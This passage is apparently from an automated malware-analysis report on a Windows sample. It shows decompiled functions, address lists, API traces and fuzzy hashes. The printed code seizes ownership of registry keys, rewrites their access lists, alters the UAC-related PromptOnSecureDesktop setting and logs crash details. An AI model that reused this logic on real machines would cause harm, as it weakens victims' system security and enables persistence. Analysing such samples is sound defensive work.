				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
				 *((intOrPtr*)(_t101 + 0x100)) = 0;
				 *((intOrPtr*)(_t101 + 0x104)) = 0;
				 *((intOrPtr*)(_t101 + 0x108)) = 0;
				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
				 *((intOrPtr*)(_t101 + 0x110)) = 0;
				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
				return _t98;
			}

0x004088b1
0x004088bf
0x004088c9
0x004088d4
0x004088df
0x004088ea
0x004088f5
0x00408900
0x0040890b
0x00408916
0x00408921
0x0040892c
0x00408937
0x0040893d
0x00408945
0x0040894c
0x00408953
0x0040895a
0x0040895d
0x00408960
0x00408967
0x0040896e
0x00408978
0x0040897f
0x00408986
0x0040898d
0x00408994
0x0040899b
0x004089a2
0x004089a9
0x004089b0
0x004089b7
0x004089be
0x004089c5
0x004089cc
0x004089d3
0x004089da
0x004089e1
0x004089e8
0x004089ef
0x004089f6
0x00408a00
0x00408a0a
0x00408a14
0x00408a1e
0x00408a28
0x00408a32
0x00408a3c
0x00408a46
0x00408a50
0x00408a5a
0x00408a64
0x00408a6e
0x00408a78
0x00408a82
0x00408a8c
0x00408a92
0x00408a98
0x00408aa2
0x00408aac
0x00408ab6
0x00408ac0
0x00408ac6
0x00408acc
0x00408ad2
0x00408ad8
0x00408adf
0x00408ae9
0x00408af3
0x00408afd
0x00408b07
0x00408b11
0x00408b1b
0x00408b25
0x00408b2f
0x00408b39
0x00408b43
0x00408b4d
0x00408b57
0x00408b61
0x00408b6b
0x00408b75
0x00408b7f
0x00408b89
0x00408b93
0x00408b9d
0x00408ba7
0x00408bb2

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98

Uniqueness

Uniqueness Score: -1.00%

Function 02230D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 004f9a87360239e29b056ade64b2ec664f20a9e9e327053e0dbe6954ff53fbf1
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 66F0FCB76105089FDF12CF64C805BAD73F9FB85215F0441A5E806D7245D330FA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02239E89, Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 02239E56
lstrcpy.KERNEL32(?,00000000), ref: 02239FCA
lstrcat.KERNEL32(?,?), ref: 02239FDB
lstrcat.KERNEL32(?,0041070C), ref: 02239FED
GetFileAttributesExA.KERNEL32(?,?,?), ref: 0223A03D
DeleteFileA.KERNEL32(?), ref: 0223A088
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0223A0BF
lstrcpy.KERNEL32 ref: 0223A118
lstrlen.KERNEL32(00000022), ref: 0223A125
GetTempPathA.KERNEL32(000001F4,?), ref: 02239EFC

Part of subcall function 02237012: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 0223706A

Part of subcall function 02236F19: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\hhzzhxuz,0223702C), ref: 02236F37
Part of subcall function 02236F19: GetProcAddress.KERNEL32(00000000), ref: 02236F3E
Part of subcall function 02236F19: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02236F64
Part of subcall function 02236F19: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02236F7B

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0223A18B
RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0223A1AE
GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0223A1FD
GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0223A204
GetDriveTypeA.KERNEL32(?), ref: 0223A24E
lstrcat.KERNEL32(?,00000000), ref: 0223A288
lstrcat.KERNEL32(?,00410A34), ref: 0223A2AE
lstrcat.KERNEL32(?,00000022), ref: 0223A2C2
lstrcat.KERNEL32(?,00410A34), ref: 0223A2DD
wsprintfA.USER32 ref: 0223A306
lstrcat.KERNEL32(?,00000000), ref: 0223A32E
lstrcat.KERNEL32(?,?), ref: 0223A34D
CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0223A370
DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0223A381
RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0223A1BA

Part of subcall function 0223994F: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 02239986
Part of subcall function 0223994F: RegDeleteValueA.ADVAPI32(?,00000000), ref: 022399A6
Part of subcall function 0223994F: RegCloseKey.ADVAPI32(?), ref: 022399AF

GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0223A3C4
GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0223A3CB
GetDriveTypeA.KERNEL32(00000022), ref: 0223A406

Strings

D, xrefs: 0223A1DE
", xrefs: 0223A3D9
", xrefs: 0223A12B
", xrefs: 0223A2C8
\, xrefs: 02239F5C
P, xrefs: 02239FFA

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
String ID: "$"$"$D$P$\
API String ID: 1653845638-2605685093
Opcode ID: a74de3c049da4994236323125331ee39a65e9fa08751685f19aaa480ac9d9ddf
Instruction ID: 45b092a1400d49ea735076ab3a40fda2c521e4623c8e19a06ca3135e4979a22f
Opcode Fuzzy Hash: a74de3c049da4994236323125331ee39a65e9fa08751685f19aaa480ac9d9ddf
Instruction Fuzzy Hash: 3CF152F1C5021AAFDB12DBE09C48FEE77BCAB09304F0444B6E649E6145DBB58A848F65

Uniqueness

Uniqueness Score: -1.00%

Function 02237CE5, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02237D0A
GetUserNameA.ADVAPI32(?,?), ref: 02237D2F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02237D66
RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02237D8B
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02237DA9
EqualSid.ADVAPI32(?,?), ref: 02237DBA
LocalAlloc.KERNEL32(00000040,00000014), ref: 02237DCE
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02237DDC
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02237DEC
RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02237DFB
LocalFree.KERNEL32(00000000), ref: 02237E02
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02237E1E

Strings

D, xrefs: 02237D5C
PromptOnSecureDesktop, xrefs: 02237F89

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: D$PromptOnSecureDesktop
API String ID: 2976863881-1403908072
Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction ID: 7a6696f0ea3a6aaceab610f7b8cc9b58aa617a79e111aae5987394c9dbdf81ee
Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction Fuzzy Hash: A5A14EB191021AAFDF128FE1DD88FEFBBB9FB08304F048069E505E6150DB758A85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00407A95, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags =  *0x4121a8; // 0x0
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t126 = 0x4121a8;
						_t83 =  &(_t126[1]); // 0x4121a9
						_t174 = _t83;
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}

0x00407aae
0x00407ab4
0x00407ab7
0x00407ac2
0x00000000
0x00407ac4
0x00407adc
0x00407adf
0x00407ae5
0x00407ae7
0x00407da7
0x00407daa
0x00000000
0x00407aed
0x00407b0c
0x00407b13
0x00407b16
0x00407b1c
0x00407b1e
0x00000000
0x00000000
0x00407b34
0x00407b3b
0x00407b41
0x00407b43
0x00000000
0x00000000
0x00407b59
0x00407b5f
0x00407b61
0x00407bb8
0x00407bcb
0x00407bce
0x00407bd4
0x00407bd6
0x00407da6
0x00000000
0x00407da6
0x00407bdc
0x00407bdf
0x00407be1
0x00000000
0x00000000
0x00407be9
0x00407beb
0x00407bee
0x00407bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00407bf8
0x00407bf8
0x00407c00
0x00407c06
0x00407c08
0x00407cc6
0x00407cc6
0x00407cc6
0x00407cc6
0x00000000
0x00407cc6
0x00407c14
0x00407c16
0x00407c19
0x00407c1b
0x00407c4f
0x00407c4f
0x00407c52
0x00407c57
0x00407c5e
0x00407c5e
0x00407c5e
0x00407c66
0x00407c6c
0x00407c6f
0x00407c71
0x00407c86
0x00407c73
0x00407c78
0x00407c7f
0x00407c7f
0x00407c8b
0x00407c8e
0x00407c90
0x00407c93
0x00407c96
0x00407c96
0x00407c9d
0x00407c9f
0x00407ca7
0x00407ca7
0x00407ca9
0x00407cac
0x00407cb2
0x00407cb2
0x00407cb5
0x00407cc3
0x00000000
0x00407ca1
0x00407ca1
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407c1d
0x00407c1d
0x00407c27
0x00407c2d
0x00407c2f
0x00000000
0x00000000
0x00407c31
0x00407c32
0x00407c34
0x00000000
0x00000000
0x00000000
0x00407c34
0x00407c36
0x00407c38
0x00000000
0x00000000
0x00407c40
0x00407c46
0x00407cc9
0x00407cc9
0x00407cd0
0x00407cd0
0x00407cd9
0x00407cdc
0x00000000
0x00000000
0x00407ce2
0x00407ce8
0x00407d5a
0x00407d61
0x00407d6a
0x00407d6c
0x00407d6e
0x00407d72
0x00407d78
0x00407d7a
0x00407d82
0x00407d88
0x00407d8a
0x00407d92
0x00407d98
0x00407d9a
0x00407d9c
0x00407d9c
0x00407d9a
0x00407d8a
0x00407da0
0x00407da0
0x00000000
0x00407d6e
0x00407cea
0x00407cf0
0x00000000
0x00000000
0x00407cff
0x00407d05
0x00407d0b
0x00407d0d
0x00000000
0x00000000
0x00407d14
0x00407d16
0x00407d16
0x00407d19
0x00407d19
0x00407d1b
0x00407d1c
0x00407d1c
0x00407d4a
0x00407d50
0x00407d52
0x00407d54
0x00407d54
0x00000000
0x00407d52
0x00407b6a
0x00407b70
0x00407b72
0x00000000
0x00000000
0x00407b7b
0x00407b84
0x00407b86
0x00407b88
0x00407b8c
0x00407b92
0x00407b94
0x00407b9c
0x00407ba2
0x00407ba4
0x00407bab
0x00407bab
0x00407ba4
0x00407bb2
0x00407bb2
0x00000000
0x00407b88

APIs

RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
LocalFree.KERNEL32(00000000), ref: 00407BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE

Strings

D, xrefs: 00407B0C
PromptOnSecureDesktop, xrefs: 00407D39

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: D$PromptOnSecureDesktop
API String ID: 2976863881-1403908072
Opcode ID: 8226ce41931dc07f2dac1faf390fa1230816c73ff31e8f8cc36009fb0dc3a3d9
Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
Opcode Fuzzy Hash: 8226ce41931dc07f2dac1faf390fa1230816c73ff31e8f8cc36009fb0dc3a3d9
Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406511, Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}

0x00406511
0x00406512
0x0040651c
0x00406521
0x00406524
0x00406532
0x0040654d
0x0040654f
0x00406552
0x00406564
0x0040674e
0x00406755
0x00406755
0x0040656d
0x00406578
0x00406587
0x004065a3
0x004065e3
0x004065ee
0x004065f9
0x00406600
0x00406606
0x00406607
0x00406608
0x00406609
0x0040660f
0x0040661b
0x0040661c
0x0040661f
0x00406620
0x00406623
0x00406626
0x0040662c
0x0040662f
0x00406632
0x00406639
0x0040663a
0x0040663d
0x00406640
0x0040668a
0x0040668a
0x00406696
0x0040669e
0x00000000
0x00000000
0x00406643
0x00406648
0x00406650
0x00406671
0x00406673
0x00406676
0x00406678
0x00406678
0x0040667a
0x0040667d
0x0040667e
0x0040667f
0x00406680
0x00406681
0x00406688
0x00406689
0x00000000
0x00406689
0x00000000
0x00406648
0x004066a0
0x004066b3
0x004066b5
0x004066ba
0x004066bd
0x004066c7
0x004066cc
0x004066d1
0x004066d7
0x004066d7
0x004066d8
0x004066eb
0x004066eb
0x004066ff
0x00406701
0x00406704
0x00406706
0x00406706
0x00406709
0x0040670c
0x0040671f
0x00406734
0x0040673c
0x0040674b

APIs

wsprintfA.USER32 ref: 0040654D
IsBadReadPtr.KERNEL32(?,00000008), ref: 0040655C
htonl.WS2_32(?), ref: 00406578
htonl.WS2_32(?), ref: 00406587
wsprintfA.USER32 ref: 0040659B
wsprintfA.USER32 ref: 004065DC
